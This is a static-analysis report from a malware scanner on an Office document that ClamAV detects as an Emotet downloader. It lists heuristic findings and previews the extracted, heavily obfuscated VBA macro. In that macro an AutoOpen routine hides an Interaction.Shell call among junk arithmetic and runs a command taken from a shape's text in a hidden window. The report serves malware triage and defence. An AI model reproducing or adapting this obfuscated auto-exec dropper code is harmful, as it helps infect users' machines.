MALICIOUS
292
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-6775899-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6775899-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
uzJcUKSWDRfIjZAwiLjq = 204420589 * CInt(236549888) + LALjNOBRPLIhjwp + CLng(47207401 + Sgn(zqSuEipXNPutQrwKr) - 328848307 * 188832659) - iFIBzPwbsQApERq + Chr(RMHVWIAwHXzUJWrAMzmuiQ) * 304596774 / CStr(268327262) / (NiwPFpzBJsfqGnVEJucQb / 114418975 / YzcGivGARSnIiEjBiz / Fix(AiMJFKRqYWSYGwIXPc + Hex(UGDsNXTirAZsuQIQrMpXv) + 88864000 + CBool(31650463 + izuhMWjTYwfMzmzmmjZqz))) KfjIpXS = Array(YArzo, dZdsuRGf, IShNIvsN, Interaction.Shell(pVzJboRGjW, tiibuPbS), zzswvH) wGcNDURivkiScwIMMrUDRYU = 49397303 * CInt(332804455) + zjizYNLrhtOadIDTsm + CLng(203892046 + Sgn(uiARAtdQdalUOjXlE) - 327116878 * 79939843) - GkRPwmNLzwfhcjbTfM + Chr(fkuNHItLwlSOvaJIKNlTNfRR) * 207642953 / CStr(307250646) / (siFDFsAhkLWJGE / 177855782 / ahjkHSbRGttjzSdiM / Fix(AjrhMWutYwnDiO + Hex(OqkvKwZDnzLwQhRiozCEua) + 294682827 + CBool(134677239 + pNtfiDOiwlctmCHb))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() AsihYrZA -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8486 bytes |
SHA-256: fbe3d37b7c2d2a57b9d344e2a99d34fc8162087fd6104fcff16e585b625b79e6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
206 of 236 identifiers look randomly generated (e.g. 'FfZsUuidBPZcpMcBawjfZYlp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "clZKCFIDWksX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() AsihYrZA End Sub Attribute VB_Name = "ZqktwAwsY" Function AsihYrZA() On Error Resume Next YcWUwtznKYdUPTnJ = 103716877 * CInt(81329053) + MwAJtovjmJqDTmFLBSG + CLng(316735878 + Sgn(lMmDQGldMXnDVZMXSdfCKM) - 194326199 * 134786197) - KiKHmrIQlblOFdhKFa + Chr(DzzNsnioatiYjRiFXaWZji) * 256266694 / CStr(241613479) / (bJNAzsElrRVNVSTDChXGCCwX / 152757948 / jjAFYNMPQiVocAam / Fix(ANsBHCWiwPivYMpcnIUlmsI + Hex(GBpiNEWjPKvJiI) + 185144087 + CBool(219085520 + bbziTrRfLprFBFHFrvGN))) ruZIwqkPcNWSIdbLSKTQBjG = 221806538 * CInt(334412271) + XDnFUJTLwKMEZdFvHqNV + CLng(141041300 + Sgn(YBqAwisKnsJQThbWtN) - 335850019 * 318638644) - QwOlpKFYQUcKAilPULoT + Chr(XUuIKXTlwAWZqHDcOITmlX) * 158615355 / CStr(216904733) / (SDpHZCKdutiUcfm / 251537707 / TTGlJWimFCUjBAwNCrUiiX / Fix(MvwOYHmchAzDEaUJjGUTzpws + Hex(hHZnRHJvWtpNIKiTanfDwsm) + 222983203 + CBool(227596877 + XJEwWzDVrAMpPsoHhhfvYw))) LdbTiCHmUUkNQqIcAHSzLYZc = 310764678 * CInt(272282886) + lzPnoLjpjVHwOVb + CLng(326614885 + Sgn(TQkwBSkPRzlmDwYpwWo) - 34084465 * 220534347) - BhBbGtKDijbAJiEIjffYXOzD + Chr(XjHSzmsrWOCvZMrENSBK) * 18527039 / CStr(270676479) / (knmJaJZnjwziJCkfwiJmPCN / 64724335 / nTJvwsZiqXiMdShzbS / Fix(adhBcnEbsCdhacpmpQrnFZAT + Hex(GSTQcpojPjqFRjHrQjfM) + 274552132 + CBool(28023599 + ofsjjfrAcOWWVlLQMowKt))) DjunKlqcZzojcAiwIspmP = 74939438 * CInt(37651455) + VaFiNpAzfiQowGjDHr + CLng(158884797 + Sgn(vTfHZjMuRmRria) - 117543764 * 238051328) - HOkzpDtktBCLlfXnDYBu + Chr(IicFhtRYKWovYAcnEGPlWjhK) * 226594009 / CStr(213278973) / (uEaCPphzkHrHKcM / 232205748 / NPNfuzzSmJccwSXBlWTk / Fix(YGqAsjMwFJKwCwSTcA + Hex(ajdjEWnpUGZGswL) + 272417081 + CBool(61489737 + iCTmThzRfuWFiJWOKk))) QJKokldLsoddaHiPpRNIim = 339432473 * CInt(11113181) + wNQwmAniZYAuOCf + CLng(325777735 + Sgn(LkrEnRXQfSYzKiK) - 57620272 * 211455399) - XNNGnqzBjdUbPhLWaPJEJw + Chr(hHiOiOtqmhPHkvFwBElhuwD) * 20655617 / CStr(281014265) / (oDuwbdbUfwEbUmpmitAaba / 139968422 / HzYOwlDfXqaqwnGlj / Fix(PHsajzsHNKDQNNhcq + Hex(FMVuuZDiLwqvnOtLLNZ) + 222324386 + CBool(105848574 + WrXtcHdMITwifTuVMTW))) zlMSvzBuNDQiIMZ = 266414590 * CInt(9888782) + MpjwzrojlEwZfnH + CLng(228511040 + Sgn(pzVVoREPMhhONjABoGZWAl) - 138473533 * 197539649) - MwwoXdXZYjqfkXXi + Chr(nJHVXYwXrhhMmEcrJcVG) * 180213227 / CStr(267332919) / (JoowJVDiCrTwLW / 281025972 / XBQjvpMmiOobvCYFwFzjib / Fix(CnwfVSFRVSmzELIITbCRvh + Hex(nzSOzFYKHvOOtzKrTZwS) + 59012483 + CBool(54428402 + TuqwdEfJrULLfC))) Set LwIfB = clZKCFIDWksX.Shapes(zPLJkiswP + "lKOIOflTtnrmZt" + fvwTIJ).TextFrame pDifQJLzbHFVQhQWhPaQYdL = 276158420 * CInt(99711208) + JXifBlRDrRRBpivdw + CLng(221276721 + Sgn(zrhiWDAKVTMssQAzoOvFTD) - 82196784 * 276927067) - FfZsUuidBPZcpMcBawjfZYlp + Chr(HPDcUvirjQXbRAZhPrAbW) * 338381871 / CStr(14623528) / (EtHcKahukJNfbBjUuk / 38729579 / EaIwKzJjkOMHMkYboBjIjdqI / Fix(tGNLjjltGOikLRNQAJWwFS + Hex(dEjsEzLajAJQrvVEhaOFVtr) + 189113731 + CBool(237086020 + siUULjbPkGAnhwvnuj))) NsSCsUWhXbldVdoqGtl = 203072558 * CInt(138541343) + UwXmLtuMpYiqjMYdsjOQi + CLng(174000534 + Sgn(auoOqSlKoFdYUiFJc) - 254992718 * 76575207) - NzizcRdBCQEFuhwrWiDtDO + Chr(lCoEwmZldSoDbQqmZpjHXAY) * 195262013 / CStr(252117885) / (OmwiRiwItvnNfPcfbmFiV / 182444682 / siEUGTkdKSQYnnuAGETW / Fix(wMKTfrZmXHMmFFENNspISdu + Hex(rosjlzaBEltSuBabL) + 281625172 + CBool(256203492 + DlhhqntMiOcVRvbq))) QQAfjjVkoDCRTnqKojTmhkf = 248038567 * CInt(182079918) + TBtqliZTGaJsUPE + CLng(341599442 + Sgn(OowJENCjUAvNfkODZQTqzS) - 157215702 * 295053432) - jPBvPEhhwQzizO + Chr(qJQddFapupuwkJqwQDJXzA) * 242801866 / CStr(36834775) / (NfjURYcCfAoCuOuFaHGUFwYF / 130635381 / boqqpYKhQZrVdQSwFIBuV / Fix(ORXtikrQHdAjzoLpKQrNwV + Hex(EdqCIrPEZLlZYSwuZ) + 276141321 + CBool(340648509 + OVtSdlPwlDIqsDSPo))) pVzJboRGjW = LwIfB.ContainingRange + UfFoWr + jNDIkE + Pocpb + DtsRKh + ppOuBsz + aizYD + rShivZLu + BvdaBn DHuKGOiuVjdvNzAj = 110192674 * CInt(236000574) + fOmbifLqqEVlLzKJvpvhI + CLng(208865738 + Sgn(vBwDALOHUoiazQ) - 207123509 * 108995101) - uXspzwRwCpFrVBYzNrZh + Chr(LfczBzdWLtPYQnknLwD) * 206495969 / CStr(34108842) / (VJQzmJalYFiDjsPszBnbrwpS / 29057494 / nMBuWCWNJTjCKTwZU / Fix(pNDsXSwCrdGZTzuX + Hex(OjdjjhWjwMvqTfRbid) + 285250695 + CBool(69308351 + oiwUKsGjziHmwhqqbJjhIaGD))) mOtcCkRmiAmXNar = 232335473 * CInt(252502664) + mOALaPNmqPtTDiOE + CLng(135046303 + Sgn(tsCYuGLuKPWlHK) - 53388950 * 147987983) - mIboiOQtBtKwHJJGoquHOUt + Chr(jEwPFHiLhkcvtOOdmisNAzCG) * 84703525 / CStr(205800442) / (UNPjSObIaQAouKzPXj / 95958323 / abQVjbjwiBsCaoNz / Fix(DKjRFoNlqwCBifZwS + Hex(szuwqicZYYzOFzCwTWivUnD) + 234127164 + CBool(296102321 + izzWSEHwVzYGTwpjQonb))) hhoKUXqwrEjtLGPEMwOatT = 110641801 * CInt(48344479) + iRPrfuHHdRSiCt + CLng(301840360 + Sgn(KSBKEuYTGumdXsOR) - 217987851 * 45536270) - GbGLJcmhpwZKEUPiAPzwo + Chr(wlkIdjkDBzvInjDGrhSMjWj) * 238834408 / CStr(224043341) / (IKNBkIwNfVbBwCw / 253851270 / cOvjfftXPjbJaEAaVbapzNnL / Fix(EhfqiPPwaEVmbcfUdUc + Hex(EFRaadbWzwPakGbzNh) + 217157296 + CBool(108704487 + MzziotwvUVsLqVzP))) lXVDpEJiKpwodBRRCiREiq = 59395735 * CInt(33408806) + iOtcMVlqrRKBRFzkSPJvOQ + CLng(96665649 + Sgn(EwEQGIvOQOLpPFwTLzlkHP) - 245482133 * 166039926) - ULazJZOzHYNRUkiWvl + Chr(uHVMRpjQiifoMf) * 315968634 / CStr(249575783) / (UOGpwpHhkCqNDNLdiiMwzIJa / 57856513 / VcjBlYwlBhiNzRNfjnsDb / Fix(TKiAjnzMEjjNUfwjQ + Hex(ORMdzVjvlTcWhFIEI) + 160802899 + CBool(151765194 + pLopczjkzihzXapKEpLIT))) JOQpjPTnTiCzcfpmZjYznbY = 181523301 * CInt(124226822) + SCwpEBSjwCcCFLiDzQKwzCS + CLng(267993812 + Sgn(WAtGipoWnwQoiiAjvim) - 64253039 * 153170980) - NOjcHRUtPkJPhBYZOMoj + Chr(OSPUmJRDUfiBsnfXG) * 223741070 / CStr(152735047) / (uhffOzzIVTaVqN / 333033299 / UHVICpvFiNpNtCIiQiXhnjGo / Fix(JiBEJLiojCwMPzEl + Hex(AAIlPSLwEMqQIkAhwsH) + 301628404 + CBool(9640339 + CKYJAJSBiSvNjGjXuP))) nrSJddQICAONlAsk = 259447491 * CInt(81160398) + oGjtzOmOidzplbrjTKd + CLng(236770114 + Sgn(czjtDXZOMpkvQUFDwUuqPhiF) - 75349650 * 186905151) - tTYaKcaLGAAuqNAWoMtUGm + Chr(VpisjvVdiblfunOaTqJw) * 22040180 / CStr(329033852) / (EdOLptRHfHqDlbjrQlW / 118755644 / EhGialaiznZXOdPUj / Fix(jQTGXDkczjztNjfHAvId + Hex(HqdiURfXwUWjFmBzw) + 66556820 + CBool(18273959 + zmqiDatrGdTMGQcZpYDmEFAP))) Const tiibuPbS = 0 bYlIzNEWtJcWBLLw = 150422851 * CInt(131848327) + TmnNlqCmQwMAjNkrjbu + CLng(248455816 + Sgn(jsprwQiUtWWznE) - 164161747 * 267063682) - zSwboXjJsIQTiWci + Chr(kuzWmZURWcqAwJLDVb) * 185190062 / CStr(270883869) / (uUIhGIRAOzuRSUiqpMs / 182799469 / RvqIwzFQIuAtupZo / Fix(jRDQHcvjipjMjPjNQcZSZJ + Hex(MkFEtYXiFBAfaYt) + 68663937 + CBool(125892623 + ZSJYDcfQfdMzWOXIrjBXBLG))) uzJcUKSWDRfIjZAwiLjq = 204420589 * CInt(236549888) + LALjNOBRPLIhjwp + CLng(47207401 + Sgn(zqSuEipXNPutQrwKr) - 328848307 * 188832659) - iFIBzPwbsQApERq + Chr(RMHVWIAwHXzUJWrAMzmuiQ) * 304596774 / CStr(268327262) / (NiwPFpzBJsfqGnVEJucQb / 114418975 / YzcGivGARSnIiEjBiz / Fix(AiMJFKRqYWSYGwIXPc + Hex(UGDsNXTirAZsuQIQrMpXv) + 88864000 + CBool(31650463 + izuhMWjTYwfMzmzmmjZqz))) KfjIpXS = Array(YArzo, dZdsuRGf, IShNIvsN, Interaction.Shell(pVzJboRGjW, tiibuPbS), zzswvH) wGcNDURivkiScwIMMrUDRYU = 49397303 * CInt(332804455) + zjizYNLrhtOadIDTsm + CLng(203892046 + Sgn(uiARAtdQdalUOjXlE) - 327116878 * 79939843) - GkRPwmNLzwfhcjbTfM + Chr(fkuNHItLwlSOvaJIKNlTNfRR) * 207642953 / CStr(307250646) / (siFDFsAhkLWJGE / 177855782 / ahjkHSbRGttjzSdiM / Fix(AjrhMWutYwnDiO + Hex(OqkvKwZDnzLwQhRiozCEua) + 294682827 + CBool(134677239 + pNtfiDOiwlctmCHb))) EhYuFtpDDKQRZwLhhbRp = 317119768 * CInt(289997789) + itHizKzPwLLzMVh + CLng(75958135 + Sgn(TPmBkVrilEmdfohMYqBw) - 101733023 * 290263343) - DuRFNzwMzPoWjFIzXPvLFMm + Chr(WiloijNNbWjGSPdjm) * 292304315 / CStr(259036199) / (qSAHQtiiTjnqIzjj / 93002194 / hTCbvJVBiHlMZNZZ / Fix(DdiYlCitujswTjuVcLU + Hex(PXrlPOWwHHZQiXfG) + 237733395 + CBool(250923809 + QYhAadDLbrrwCFOMfmsIXjhm))) iIVkwTlbWdmQvlAUtNrS = 313624816 * CInt(249928246) + zGYoTCJFkIrjrwGj + CLng(31325514 + Sgn(OYjiksdaiMsvjjszVdYiSZNX) - 9058740 * 50016691) - FJWnhmTjNbUWfL + Chr(TwNpZLnuccHZjpLLdcpYQMZ) * 70639598 / CStr(59883663) / (zfVBHsTZFQKMisROt / 66690265 / MmrCQrtqmcHXCjILHYb / Fix(PGHjuARuwGBSPlwdId + Hex(JNBjwwtIjahKqSo) + 69742943 + CBool(41428344 + HHPZwtjaoHRjiCiTRHNZ))) End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.